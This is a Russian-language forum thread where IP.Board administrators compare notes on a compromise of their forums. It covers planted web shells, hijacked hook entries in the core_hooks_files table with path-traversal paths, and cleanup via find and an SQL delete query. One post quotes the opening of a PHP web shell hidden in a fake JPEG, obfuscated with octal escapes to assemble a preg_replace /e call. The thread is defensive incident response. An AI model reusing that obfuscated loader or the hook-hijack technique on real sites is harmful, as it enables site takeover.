Jump to content
Дизайн и модификация IPS Community IPBSkinsBETA
Search In
  • More options...
Find results that contain...
Find results in...

Recommended Posts

Как вариант - поиск через ssh, например так:

find www/site_dir -mtime -10d -name "*.php"

 

На modify time не стоит сильно надеется.

Share this post


Link to post
Share on other sites

Кстати заметил, у меня стоят тестовые форумы от IPS и IBR самое интересное, то что от IPS я шеллов не нашел, все они в IBR. Почему затронуло мою лицензию, ответ прост, я заливал core.php от IBR и часть локализированных версий.

Share this post


Link to post
Share on other sites

Почему затронуло мою лицензию, ответ прост, я заливал core.php от IBR

Если имеет ввиду последний патч, то на IBR стоит ссылка для скачивания на IPS, это уже выяснили вот тут.

Ищите лучше. Мне залили не зависимо от источника дистра, хоть от IBR, хоть от IPS <_<

 

 

Дописываю.

Хотя стоп! На данный момент там (на IBR) уже типа русифицированные. :P

 

В день, когда я скачивал, файлы скачанные с ИБР пришлось переименовывать, с сейчас там названия архивов с приставкой "rus".

 

но если кто-то не успел пропатчить, не рекомундую раслабляться. ;)

Share this post


Link to post
Share on other sites

Патчи от IPS я уже установил. Мда.. Что нам дальше стоит ожидать? Что школота будет заходит спокойно под администратором ))

 

P.S. Все нахожу и нахожу новые и новые файлики )) Была создана аж целая директория..

Share this post


Link to post
Share on other sites

А я все думал почему я не могу войти на свой сервер, ко всем ресурсам инета есть доступ, а к своему не могу пробиться.. Возможно ли из за этого?

Share this post


Link to post
Share on other sites

Посмотрите, может чего всадили в .htaccess, лежащем в корне.

Share this post


Link to post
Share on other sites

P.S. Все нахожу и нахожу новые и новые файлики

Шеллы все удалили? А то им ваши запладки до одного место.

 

 

в таблице `core_hooks_files` подменили путь к хукам

в boardIndexRecentTopics вел к тому самому файлу /uploads/profile/photo-128.jpg

56	15	../uploads/profile/photo-128.jpg	boardIndexRecentTopics.php	commandHooks	
57	15	../../../../../../../tmp/tmpgw4ia4	boardIndexRecentTopics.php	commandHooks

 

Теперь понятно откуда ноги растут. Тем кто нашел у себя "photo-128.jpg", обязательно проверьте таблицу ibf_core_hooks_file, и файлы на которые они указывают если есть что-то подобное.

 

Удалить можно смело выполнив такой запрос

 

DELETE chf.*, ch.* FROM ibf_core_hooks_files chf 
LEFT JOIN ibf_core_hooks ch ON (chf.hook_hook_id = ch.hook_id)
WHERE chf.hook_file_stored LIKE '%../%'

А после обязательно перестроить кеш: Система -> Управление кешем -> Перестроить весь кеш

  • Upvote 4

Share this post


Link to post
Share on other sites

Кстати, немного разбирался в действиях шалунишек... Фактически меня ломанули 4 числа, но в хуках подмена появилась аж 9! До этого была только папка cache... И по логам - она посещелась и шеллом пользовались.

 

На всякий случай рекомендую сменить пароли на фтп, пароли к базе, пароли к админским аккам и проверить крон.

Share this post


Link to post
Share on other sites

Теперь понятно откуда ноги растут. Тем кто нашел у себя "photo-128.jpg", обязательно проверьте таблицу ibf_core_hooks_file, и файлы на которые они указывают если есть что-то подобное.

как это поправить в базе????

нужен совет..)))

Share this post


Link to post
Share on other sites

Для начала попробуйте сделать переимпортирование всех хуков из админки. Если само не восстановится, то:

 

В папке hooks ищете название файла boardIndexRecentTopicsXXXXXXXXXXXXXXXXX.php. И в ячейке 'hook_file_stored' вместо "../uploads/profile/photo-128.jpg" прописываете его.

 

Потом в бекапах открываете этот файл, копируете содержимое и в ячейку 'hooks_source' вставляете.

Edited by voron333

Share this post


Link to post
Share on other sites

Нашел на одном из форумов:

 

post-5412-0-96826400-1352627307_thumb.png

 

Файл photo-128.jpg был, размером 68996 байт, но датирован 2012-10-12, и не открыватеся в граф. программах.

НО, открывается тупо в текстовых редакторах и код у него внутри начинается на:

<?php $jr4R="";/*'_S*/$iNTPs=/*sv*/$jr4R;/*)J*/$NjKTIGz="\57\56\52";$hIvw="\57\145";$PjSITU=$NjKTIGz./*XRb*/$hIvw;$irMV10S="\160\162\145";$VS7QyJz="\147\137\162";/*WiD*//*J%*/$KbMfs5P="\145\160\154";$ijt2="\141\143\145";/*7**/$dVRof=$irMV10S/*oK*/.$VS7QyJz/*S~*/./*=0y*/$KbMfs5P./*S-*/$ijt2/*A
N*/;/*+Kx*/$rh7y='ZerGO4dAg251xkIDzbahXonQ8U96SCsYVp7TjuWtJKfyN3BFql';/*,A*/$AZ7Q3bE='PRwmiEv0MHLc';/*IY*/$lvXzR4U=/*p%N*/$rh7y/*,:*/.$AZ7Q3bE;/*";d*/$AuGal=';\'2M4"hFu1`,Kl3~8./5:Nt]j#yVxW6LX!B_&CnAS}J7=%k*oc-^	+0Ozi9qQg';/*;-*/$Jfnw=/*dC*/$AuGal/*

Файл удалил еще в первый день, как только обнаружил, но открыть в текстовом редакторе догадался только сегодня. копия есть, если кому поможет.

 

Файла av-128.jpg не было. Директорию tmp чистил в самом начале, было там что-то или нет, не видел. Сейчас нет.

 

В общем, часть заразы может быть датирована любой датой!!!!!! Если закачан в архиве и распакован с архива, то дата и не будет меняться.

Share this post


Link to post
Share on other sites

@voron333, Я что то не могу найти в таблице core_hooks_files строки ведущей к "../uploads/profile/photo-128.jpg"

может быть у меня не произошли изменения из за префикса таблицы???

Share this post


Link to post
Share on other sites

@voron333, Я что то не могу найти в таблице core_hooks_files строки ведущей к "../uploads/profile/photo-128.jpg"

может быть у меня не произошли изменения из за префикса таблицы???

Нет, может еще не дошли просто )))

 

Смотрите выше я писал

Фактически меня ломанули 4 числа, но в хуках подмена появилась аж 9!

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...